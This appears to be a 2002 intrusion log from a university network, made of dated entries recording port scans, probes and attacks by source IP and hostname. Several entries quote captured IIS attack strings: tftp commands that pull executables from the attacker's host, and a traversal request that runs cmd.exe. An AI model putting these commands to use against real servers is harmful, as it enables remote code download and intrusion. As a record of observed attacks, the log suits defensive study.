2002/02/18-06:08:44.31 198.62.212.109 (Keebler Company,IL,US) 1. Attack various IIS server with command:
2002/02/18-06:08:44.31 198.62.212.109 (Keebler Company,IL,US) 2. tftp%20-i%20132.252.30.155%20GET%20cool.dll%20c:\httpodbc.dll
2002/02/18-06:10:22.89 216.39.149.244 (proxy.mav.com) scannet for port 22
2002/02/18-08:39:28.34 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080, 3128, 80, 1080, 23
2002/02/18-08:52:35.75 211.219.8.68 (korea crap) scannet for port 1433
2002/02/18-09:06:36.76 64.45.60.71 (NETlimited ,CA,US) conn to several ips ports 1024, 3072 til 2002/02/19-04:44:46.22
2002/02/18-13:26:20.32 64.114.106.22 (dcwap106.22.pris.bc.ca) ping scannet
2002/02/18-13:28:28.81 66.75.117.126 (sc-66-75-117-126.socal.rr.com) conn to 132.235.4.26:6346 repeatedly til 20:03:10.61
2002/02/18-15:18:14.50 212.179.242.111 (bzq-242-111.bezeqint.net) scannet for port 80
2002/02/18-15:44:11.26 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC,CA,US) scan 132.235.4.19 ports 1080,80,3128,81,8081,23
2002/02/18-15:44:29.46 66.169.43.139 (sc-grnvl-66-169-43-139.chartersc.net) scan 132.235.4.19 ports 1080, 23
2002/02/18-16:53:56.33 212.179.242.111:137 (bzq-242-111.bezeqint.net) netbios name scan of several ips
2002/02/18-22:03:10.29 61.177.251.43 (CHINANET Jiangsu province network-CN) conn to 132.235.1.35:21
2002/02/18-23:06:20.97 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red attack - GET /scripts/root.exe
2002/02/19-03:31:19.95 66.60.157.246 (246.dsl6660157.rstatic.surewest.net) scan 132.235.1.2 ports 1080,80,81,3128,8000,8080,8081
2002/02/19-05:09:21.00 4.61.33.207 (lsanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net) scannet for port 80
2002/02/19-07:13:06.26 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 ports 8080, 3128, 80, 1080, 23
2002/02/19-07:48:04.56 213.194.153.210 (IBERCOM SL?, SP) portscan 132.235.1.1 on ports 13[5-9],140
2002/02/19-10:04:26.37 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red/nimda/whatever attacks start
2002/02/19-10:23:34.61 217.128.155.121 (ALe-Mans-301-1-2-121.abo.wanadoo.fr) scannet for port 21
2002/02/19-12:11:27.84 195.23.10.113 (195-23-10-113.nr.ip.pt) scannet for port 111+buff overflow attacks
2002/02/19-15:17:21.32 146.20.33.71 (proxy1.monitor.dal.net-Chodey & Co.,NJ,US) probe 132.235.4.219 port 1080,80,3128,8080,81,8081,23
2002/02/19-16:43:55.88 217.125.163.33 (217-125-163-33.uc.nombres.ttd.es) 1. use anon ftp to get dummy passwd file. Crack it on his pc
2002/02/19-16:43:55.88 217.125.163.33 (217-125-163-33.uc.nombres.ttd.es) 2. Use cracked passwds (some wrong) to try to log in.
2002/02/19-16:46:08.69 172.172.81.13 (ACAC510D.ipt.aol.com) conn to 132.235.3.246:6346 repeatedly til 2002/02/19-17:41:20.93
2002/02/19-19:35:22.99 203.106.187.191 (TMnet Telekom Malaysia,MY) scannet for port 111
2002/02/19-19:56:33.43 217.129.92.207 (Cabovisao, televisao por cabo, SA,PT) scannet for port 21
2002/02/19-20:08:01.68 61.175.153.129 (CHINANET Zhejiang province network,CN) 1. scan 4 ips on port 111. attack 1 ip w/buff overflow
2002/02/19-20:08:01.68 61.175.153.129 (CHINANET Zhejiang province network,CN) 2. attack to start server on listen port (2766)
2002/02/19-20:10:52.31 203.106.187.191 (TMnet Telekom Malaysia,MY) connect on port 2766 to machine attacked by 61.175.153.129
2002/02/19-21:05:27.43 172.148.38.107 (AC94266B.ipt.aol.com) conn to 132.235.3.246:6346 repeatedly til 2002/02/19-22:11:28.28
2002/02/20-00:30:05.52 24.208.181.225 (dhcp024-208-181-225.columbus.rr.com) portscan 132.235.17.1
2002/02/20-01:57:19.50 64.38.245.228 (nttrainer.cavecreek.net) portscan 132.235.18.168 on 80.81,1080,3128,8000,8001,8010,8080,8081.8888
2002/02/20-05:58:12.78 213.252.151.40 (BCC GmbH,dE) scan 132.235.3.133 119, 22
2002/02/20-06:26:19.87 213.252.151.29 (BCC GmbH,dE) scan 132.235.3.133 21, 119, 80
2002/02/20-06:53:46.46 213.252.151.33 (BCC GmbH,dE) scan 132.235.3.133 port 22
2002/02/20-07:18:54.04 216.78.167.250 (adsl-78-167-250.gsp.bellsouth.net) scan 132.235.3.51 ports 27374 12345 139
2002/02/20-07:27:16.16 213.252.151.41 (BCC GmbH,dE) scan 132.235.3.133 port 143, 6000
2002/02/20-08:18:34.86 213.252.151.5 (BCC GmbH,dE) scan 132.235.3.133 ports 21, 8000
2002/02/20-08:48:15.47 213.252.151.24 (BCC GmbH,dE) scan 132.235.3.133 110
2002/02/20-08:57:44.07 64.9.35.139 (E Sambol Corporation,NJ,US - via adelphia) scan several ips for port 21
2002/02/20-08:57:50.84 65.101.224.250 (Rablin Express,CO,US-via US WEST...) scan several ips for port 21
2002/02/20-08:57:55.48 64.65.251.111 (host-64-65-251-111.choiceone.net) scan several ips for port 21
2002/02/20-08:57:56.77 64.8.211.76 (Network Access Solutions,HERNDON,VA,US) scan several ips for port 21
2002/02/20-08:58:00.91 210.23.111.130 (Philippines..) scan several ips for port 21
2002/02/20-08:58:09.94 65.101.146.217 (U S WEST Communications Svcs, Inc.,MN,US) scan several ips for port 21
2002/02/20-08:58:11.46 200.201.128.140 (200.201.128.140.clientes.spo.ifxnetworks.com.br) scan several ips for port 21
2002/02/20-08:58:11.99 63.64.43.121 (Las Colinas Microsoft,TX,US) scan several ips for port 21
2002/02/20-08:58:12.02 64.2.255.77 (w077.z064002255.chi-il.dsl.cnc.net) scan several ips for port 21
2002/02/20-08:58:13.83 210.23.255.167 (Philippines..) scan several ips for port 21
2002/02/20-08:58:16.44 64.65.206.154 (host-64-65-206-154.choiceone.net) scan several ips for port 21
2002/02/20-08:58:17.38 210.23.202.221 (Philippines..) scan several ips for port 21
2002/02/20-08:58:23.57 64.8.5.197 (I.D. One,NY,US-via Adelphia) scan several ips for port 21
2002/02/20-08:58:25.46 64.66.38.34 (Startec Global Communications,MD,US) scan several ips for port 21
2002/02/20-08:58:28.03 64.9.48.41 (Adelphia Business Solutions,PA,US) scan several ips for port 21
2002/02/20-08:58:36.38 64.3.176.219 (w219.z064003176.stl-mo.dsl.cnc.net) scan several ips for port 21
2002/02/20-09:01:54.85 200.201.128.140 (200.201.128.140.clientes.spo.ifxnetworks.com.br) scannet for port 21, 137
2002/02/20-09:07:49.22 65.101.130.177 (U S WEST Communications Svcs, Inc.,MN,US) scan several ips for port 21
2002/02/20-11:04:13.19 65.32.129.136 (6532129hfc136.tampabay.rr.com) scan 132.235.18.87 ports 10009,60000,10008
2002/02/20-11:11:22.26 213.252.151.38 (BCC GmbH,dE) scan 132.235.3.133 21
2002/02/20-11:46:27.66 217.84.255.95 (pD954FF5F.dip.t-dialin.net) scannet for port 80
2002/02/20-12:21:19.46 165.194.216.124 (Chungang University,SEOUL,KR) scannet for port 21
2002/02/20-12:21:19.57 165.194.216.124:21 (Chungang University ,SEOUL,KR) scan net for port 21
2002/02/20-13:15:16.04 195.241.74.82 (WORLDONLINE,NL) scannet for port 80
2002/02/20-13:45:36.28 65.32.129.136 (6532129hfc136.tampabay.rr.com) scan 132.235.18.53 ports 10009,60000,10008
2002/02/20-14:18:33.32 64.8.5.194 (I.D. One,NY,US-via Adelphia) scan several ips for port 21
2002/02/20-14:18:36.70 210.23.111.130 (Philippines..) scan several ips for port 21
2002/02/20-14:19:40.85 213.252.151.5 (BCC GmbH,dE) scan 132.235.3.133 ports 8080
2002/02/20-14:19:40.85 216.189.164.97 (chtrmb-164-97.the-beach.net) scan 132.235.3.133 port 8080
2002/02/20-14:29:55.56 213.252.151.39 (BCC GmbH,dE) scan 132.235.3.133 21, 139
2002/02/20-14:50:10.76 65.101.130.177 (U S WEST Communications Svcs, Inc.,MN,US) scan several ips for port 21
2002/02/20-14:50:11.04 65.101.146.217 (U S WEST Communications Svcs, Inc.,MN,US) scan several ips for port 21
2002/02/20-14:50:19.72 64.9.48.41 (Adelphia Business Solutions,PA,US) scan several ips for port 21
2002/02/20-14:50:19.97 64.65.206.154 (host-64-65-206-154.choiceone.net) scan several ips for port 21
2002/02/20-14:50:25.86 64.2.255.77 (w077.z064002255.chi-il.dsl.cnc.net) scan several ips for port 21
2002/02/20-14:50:27.89 65.101.224.250 (Rablin Express,CO,US-via US WEST...) scan several ips for port 21
2002/02/20-14:50:41.56 200.201.128.140 (200.201.128.140.clientes.spo.ifxnetworks.com.br) scan several ips for port 21
2002/02/20-14:50:54.04 64.8.211.76 (Network Access Solutions,HERNDON,VA,US) scan several ips for port 21
2002/02/20-14:51:41.25 63.64.43.121 (Las Colinas Microsoft,TX,US) scan several ips for port 21
2002/02/20-14:51:41.44 64.3.176.219 (w219.z064003176.stl-mo.dsl.cnc.net) scan several ips for port 21
2002/02/20-14:51:53.99 64.66.38.34 (Startec Global Communications,MD,US) scan several ips for port 21
2002/02/20-15:22:23.24 172.165.191.78 (ACA5BF4E.ipt.aol.com) scan 132.235.3.246:6346 continuous til 23:08:19.61
2002/02/20-15:50:58.71 213.252.151.30 (BCC GmbH,dE) scan 132.235.3.133 21
2002/02/20-16:12:08.57 147.208.171.139 (security.norton.com) portscan 132.235.16.57
2002/02/20-16:45:41.70 132.177.204.27 (nhptv-27.unh.edu) 1. attack IIS servers on campus with command:
2002/02/20-16:45:41.70 132.177.204.27 (nhptv-27.unh.edu) 2. tftp%20-i%20132.177.204.27%20GET%20Admin.dll%20c:\Admin.dll
2002/02/20-17:31:04.78 208.180.59.121 (cdm-208-59-121-alex.cox-internet.com) scannet for port 27374
2002/02/20-17:31:12.65 208.180.59.121 (cdm-208-59-121-alex.cox-internet.com) scannet for port 27374
2002/02/20-18:03:58.59 213.252.151.46 (BCC GmbH,dE) scan 132.235.3.133 port 110, 113
2002/02/20-18:04:04.34 213.252.151.47 (BCC GmbH,dE) scan 132.235.3.133 port 111
2002/02/20-18:40:47.17 195.6.82.66 (linksecours.usinor.com) scan 132.235.1.252 ports 25,37852 3 times
2002/02/20-18:40:47.34 195.146.209.253 (Nord - FRANCE,FR) scan 132.235.1.252 ports 25,37852
2002/02/20-18:40:53.00 213.252.151.16 (BCC GmbH,dE) scan 132.235.3.133 113
2002/02/20-18:40:53.00 213.252.151.28 (BCC GmbH,dE) scan 132.235.3.133 80, 3306
2002/02/20-18:42:34.47 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) code red/nimda/whatever attacks start
2002/02/20-19:13:01.84 131.156.43.131 (orient14.admin.niu.edu) scan 132.235.3.133 port 111
2002/02/20-19:28:38.76 210.23.111.130 (Philippines..) scan several ips for port 21
2002/02/20-19:55:12.95 213.252.151.6 (BCC GmbH,dE) scan 132.235.3.133 119
2002/02/20-20:19:16.11 61.177.61.242 (Suzhou kaimei electric co ltd,CN) 1. attack IIS servers on campus with command:
2002/02/20-20:19:16.11 61.177.61.242 (Suzhou kaimei electric co ltd,CN) 2. tftp%20-i%20132.232.9.225%20GET%20Admin.dll%20c:\Admin.dll
2002/02/21-00:58:00.22 132.177.70.172 (student3a-472.unh.edu) tftp%20-i%20132.177.70.172%20GET%20Admin.dll%20d:\Admin.dll
2002/02/21-00:58:00.22 132.177.70.172 (student3a-472.unh.edu) 1. attack IIS servers on campus with command:
2002/02/21-04:00:59.98 202.149.81.146 (PT.
Satata Neka Tama,ID) scan 132.235.1.252 ports 25,37852 2002/02/21-07:50:36.04 213.237.71.207 (213.237.71.207.adsl.vg.worldonline.dk) scannet for port 80 2002/02/21-11:25:00.77 63.169.40.130 (lebshells.acool.net) scan 132.235.2.114 for ports 1080.80.3128,81,8081,23 2002/02/21-12:03:17.55 217.88.139.125 (pD9588B7D.dip.t-dialin.net) scannet for port 21 2002/02/21-12:47:37.34 80.11.92.83 (ANancy-103-1-2-83.abo.wanadoo.fr) scannet for port 21 2002/02/21-13:00:32.60 204.152.186.58 (proxy8.monitor.dal.net-M.I.B.H., LLC ,CA,US) scan 132.235.4.220 for port 1080,23,80,3128,81,8080,8081 2002/02/21-13:02:52.34 66.169.44.131 (sc-grnvl-66-169-44-131.chartersc.net) scan 132.235.4.220 for port 1080,23 3 times 2002/02/21-15:56:35.07 172.155.8.51 (AC9B0833.ipt.aol.com) continusouly conn to 132.235.3.246:6346 til 16:18:33.81 2002/02/21-20:32:24.07 129.1.200.138 (tpitten.res.bgsu.edu) scannet with ping 2002/02/21-20:34:46.76 129.1.200.138 (tpitten.res.bgsu.edu) scannet for port 1214 2002/02/21-20:55:15.71 172.143.219.53 (AC8FDB35.ipt.aol.com) continusouly conn to 132.235.3.246:6346 til 21:15:25.18 2002/02/21-23:19:30.59 65.94.184.159 (Bell Nexxia,QUEBEC,CA) scannet for port 80 2002/02/22-00:02:52.26 24.199.87.149 (user-0ccelsl.cable.mindspring.com) scannet for port 80 2002/02/22-00:23:19.63 172.164.115.171 (ACA473AB.ipt.aol.com) continusouly conn to 132.235.3.246:6346 til 2002/02/22-00:38:29.09 2002/02/22-01:18:38.43 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/22-18:35:35.24 2002/02/22-01:32:15.87 65.94.184.159 (Bell Nexxia,QUEBEC,CA) do heavy DIR cmd scan via IIS buff overflow on iis server. 2002/02/22-01:37:35.34 66.110.147.170 (adsl-66.110.147-170.globetrotter.net) 1. attack IIS server with buff overflow cmd: 2002/02/22-01:37:35.34 66.110.147.170 (adsl-66.110.147-170.globetrotter.net) 2. 
tftp+-i+66.110.147.170+get+iss.exe+c:\winnt\tasks\iss.exe 2002/02/22-03:30:33.78 80.128.233.44 (p5080E92C.dip.t-dialin.net) scannet for ports 80,1433 2002/02/22-10:37:38.40 195.96.158.98 (Archway S.r.l,Milano,IT) scannet for port 515 2002/02/22-15:20:33.01 165.229.22.33 (arch.yeungnam.ac.kr) scannet for port 22 2002/02/22-16:23:22.45 217.128.197.134 (AAmiens-104-1-1-134.abo.wanadoo.fr) scan several ips for port 21 2002/02/22-21:46:57.38 205.207.148.253 (sunset.aci.on.ca) scannet for port 80 2002/02/22-22:05:27.48 62.212.115.245 (telehouse-102-1-26-245.adsl.nerim.net) scannet for port 80 2002/02/23-05:49:20.40 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/24-05:58:07.91 2002/02/23-07:08:02.58 193.170.188.243 (aurora.uni-ak.ac.at) scannet for port 80 2002/02/23-08:19:08.57 211.237.89.250 (Korea crap) scannt for port 22 2002/02/23-18:07:21.45 35.8.90.128 (Michigan State University,MI,US) scannet for port 139,137 2002/02/24-00:43:49.22 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) ping scan net 2002/02/24-00:44:06.79 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) portscan several ips for 21,25,80,110,119,6588 2002/02/24-00:44:07.32 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) scannet for port 23 2002/02/24-02:10:46.99 66.44.68.142 (66-44-68-142.s142.tnt8.lnhva.md.dialup.rcn.com) portscan net for 21,25,80,110,119,6588 .x.du.log.19428/cge2cgf_contents.dat:GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+c:\sbpci\iss.exe HTTP/1.1 2002/02/24-05:58:17.05 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/25-05:59:19.92 2002/02/24-07:13:27.06 200.60.108.56 (TAI LOY S.A,LIMA,PE) scannet for port 111 2002/02/24-12:28:25.45 63.170.254.181 (maya3.mayaco.com) scannet for port 1433 2002/02/24-19:29:16.93 129.21.133.179 (res133b-179.rh.rit.edu) scannet for port 22 2002/02/25-04:06:38.02 212.186.231.163 (cha212186231163.chello.fr) scannet for port 21 
2002/02/25-05:59:57.49 66.75.117.126 (sc-66-75-117-126.socal.rr.com) beat on 132.235.4.26:6346 til 2002/02/25-22:35:24.86 2002/02/25-08:10:18.16 66.140.25.157 (ROBERT LEVIN,TX,US) portcan 132.235.3.137 ports 8080,3128,80,1080,23 2002/02/25-09:04:01.94 128.230.89.51 (source.syr.edu) scannet for port 23,22 2002/02/25-09:04:14.13 128.230.89.51 (source.syr.edu) scannet for port 22 2002/02/25-09:29:49.80 218.5.3.244 (CHINANET fujian province network,CN) portscan 132.235.201.31 ports 139,445,137 2002/02/25-12:08:14.41 66.75.117.126 (sc-66-75-117-126.socal.rr.com) probe 132.235.4.26:6346 2002/02/25-12:35:35.82 204.192.99.126 (dyn126-nas03.athens.frognet.net) scan 132.235.1[1,2] for port 389 2002/02/25-14:08:52.51 216.205.78.109 (109-216.205.78.dellhost.com) scannet for port 22 2002/02/25-14:37:57.16 4.61.33.207 (sanca1-ar23-4-61-033-207.lsanca1.vz.dsl.gtei.net)probe port 21 on various ips 2002/02/25-15:14:59.13 217.128.250.60 (AMarseille-201-1-5-60.abo.wanadoo.fr) scannet for port 21 2002/02/25-17:12:51.81 203.186.182.148 (203186182148.ctinets.com) scannet for port 21 2002/02/25-17:15:51.46 137.205.227.118 (University of Warwick,COVENTYR,GB) scannet for port 21 2002/02/25-20:29:46.07 129.8.41.73 (California State University at Fresno,CA,US) scan net for port 80 2002/02/25-21:33:35.56 24.71.184.243 (h24-71-184-243.ss.shawcable.net) probe 132.235.4.64:6346 2002/02/25-21:46:13.46 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) 1. attack IIS server with command: 2002/02/25-21:46:13.46 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) 2. 
c+tftp+-i+65.94.188.134+get+serv-u.ini+c:\inetpub\scripts\serv-u.ini 2002/02/25-21:55:23.80 132.235.163.117 (dhcp-163-117.east-green.ohiou.edu) scannet for port 21 2002/02/25-22:13:02.15 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) attack IIS server with command /c+c:\sbpci\iss.exe 2002/02/25-22:23:23.70 172.150.73.160 (AC9649A0.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/25-22:31:39.46 2002/02/25-22:45:29.09 65.94.188.134 (Bell Nexxia,Montreal, Quebec,CA) conn to target iis machine on port 8888 2002/02/26-01:17:09.22 128.95.237.48 (University of Washington,WA,US) ping scan of net 2002/02/26-01:17:12.70 128.95.237.48 (University of Washington,wa,us) scannet for port 135,139 2002/02/26-06:53:11.32 217.224.5.22 (pD9E00516.dip.t-dialin.net) scannet for port 80 2002/02/26-07:23:07.06 137.165.10.166 (bquinn-newdell.williams.edu) pound on 132.235.201.42:6346 til 2002/02/26-14:47:21.82 2002/02/26-07:44:32.09 66.140.25.157 (ROBERT LEVIN,TX,US) portcan 132.235.3.137 ports 8080,3128,80,1080,23 2002/02/26-11:13:43.78 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/02/26-11:20:52.82 132.235.162.168 (dhcp-162-168.east-green.ohiou.edu) scan serverl ips on port 3343[123] 2002/02/26-12:10:05.83 213.14.25.208 (VESTELNET,TR) scannet for port 27374 2002/02/26-13:05:47.31 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for oprt 524 2002/02/26-13:25:04.92 66.75.117.126 (sc-66-75-117-126.socal.rr.com) pound on 132.235.4.26:6346 til 2002/02/27-05:48:07.36 2002/02/26-13:26:32.56 80.13.154.98 (ALyon-202-1-5-98.abo.wanadoo.fr) scannet for port 80 2002/02/26-15:09:21.35 65.94.145.77 (MTL-HSE-ppp180725.qc.sympatico.ca) try to get to hacker ftp server instadedd by 65.94.188.134 2002/02/26-16:17:48.33 211.21.159.90 (CHTD, Chunghwa Telecom Co.,Ltd,TW) scnnet for port 21 2002/02/26-16:17:48.43 211.21.159.90 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 21 2002/02/26-16:26:57.02 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 
(ingrislock - HMmmmmm) 2002/02/26-16:50:25.96 217.136.73.225 (adsl-51681.turboline.skynet.be) scannet for port 21 2002/02/26-16:50:32.26 217.136.73.225 (adsl-51681.turboline.skynet.be) scannet for port 21 2002/02/26-16:58:36.40 80.128.17.18 (p50801112.dip.t-dialin.net) bang on 132.235.201.211:6346 til 2002/02/26-17:32:08.62 2002/02/26-17:57:44.82 172.143.34.173 (AC8F22AD.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/26-19:36:40.84 2002/02/26-22:04:26.04 172.159.121.243 (AC9F79F3.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/26-23:49:51.20 2002/02/26-22:46:30.00 216.190.255.220 (Wasatch Hosting,UT,US) scannet for port 25 2002/02/26-23:50:29.52 217.128.164.63 (ANancy-101-1-5-63.abo.wanadoo.fr) scan serveral ips for port 445 2002/02/27-03:30:40.29 63.250.72.14 (ppp-14.danville.net) scan 132.235.201.[40,126] ports 585 548 5500 8080 25867 21 2002/02/27-05:45:54.42 62.158.141.151 (p3E9E8D97.dip.t-dialin.net) probe 132.235.3.106 pots 139, 12345, 27374 2002/02/27-05:48:42.80 66.71.42.8 (KAM391.rh.psu.edu) bang on 132.235.4.26:6346 til 2002/02/28-05:52:16.86 2002/02/27-07:50:06.00 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23 2002/02/27-07:56:28.50 211.172.226.26 (korea crap) scannet for port 1524 2002/02/27-07:56:29.16 211.172.226.26 (korea crap) scnnet for port 1524 2002/02/27-09:28:11.33 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23 2002/02/27-10:12:38.30 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.3.137 for ports 8080, 1080 80 3128 23 2002/02/27-13:29:05.09 217.136.73.225 (adsl-51681.turboline.skynet.be) probe port 21 on networked printer 2002/02/27-14:31:20.84 217.136.73.225 (adsl-51681.turboline.skynet.be) probe port 21 on networked printer 2002/02/27-15:30:48.29 200.221.91.38 (200-221-91-38.dsl-sp.uol.com.br) scannet for port 22 2002/02/27-15:33:40.48 63.199.26.228 (adsl-63-199-26-228.dsl.snfc21.pacbell.net) scannet for port 123 2002/02/27-15:55:00.54 63.199.26.228 
(adsl-63-199-26-228.dsl.snfc21.pacbell.net) scannet for port 22 2002/02/27-17:02:47.51 202.107.53.125 (CHINANET liaoning province network,CN) scannet for port 515 2002/02/28-02:13:51.59 132.235.197.131 (hardnoc3.cns.ohiou.edu) scannet for port 161 2002/02/28-05:53:38.73 66.75.117.126 (sc-66-75-117-126.socal.rr.com) pound on 132.235.4.26:6346 til 2002/03/01-01:00:08.22 2002/02/28-10:24:51.06 130.13.158.247 (vdsl-130-13-158-247.phnx.uswest.net) bang on 132.235.3.216:6346 til 2002/03/01-05:43:10.89 2002/02/28-10:51:21.52 62.4.67.208 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-11:06:53.98 192.44.243.18 (c2.sll.se) scnnet for port 21 2002/02/28-11:26:24.27 62.4.67.86 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-11:51:27.50 62.4.67.146 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-12:11:17.62 217.128.85.107 (ALyon-202-1-2-107.abo.wanadoo.fr) IIS attack: tftp+-i+217.128.85.107+get+servudaemon.exe+c:\Inetpub\scripts\servudaemon.exe 2002/02/28-16:05:13.32 207.239.248.92 (FrogNet, Inc.,OH,US) scannet for port 139 2002/02/28-16:05:26.69 207.239.248.92 (FrogNet, Inc.,OH,US) portscan multiple ips for ports 445,139,137,80 2002/02/28-16:24:06.75 62.4.67.142 (NetGameZone.de) probe several ips ports 1024 3072 2002/02/28-16:35:52.00 172.137.7.118 (AC890776.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/28-21:22:09.39 2002/02/28-17:10:31.33 66.140.25.157 (ROBERT LEVIN,TX,US) scan 132.235.1.171 for ports 8080, 1080 80 3128 23 2002/02/28-20:26:35.24 216.3.1.11 (dyn010-ts8a.athens.frognet.net) scannet ofr port 1214 2002/02/28-20:55:56.22 66.32.156.9 (user-1121709.dsl.mindspring.com) scannet for port 161 2002/02/28-21:44:29.48 172.173.253.179 (ACADFDB3.ipt.aol.com) bang on 132.235.3.246:6346 til 2002/02/28-22:07:58.63 2002/02/28-22:44:45.61 66.186.68.152 (Chelmsford-cable-66-186-68-152.vianet.ca) scannet for port 80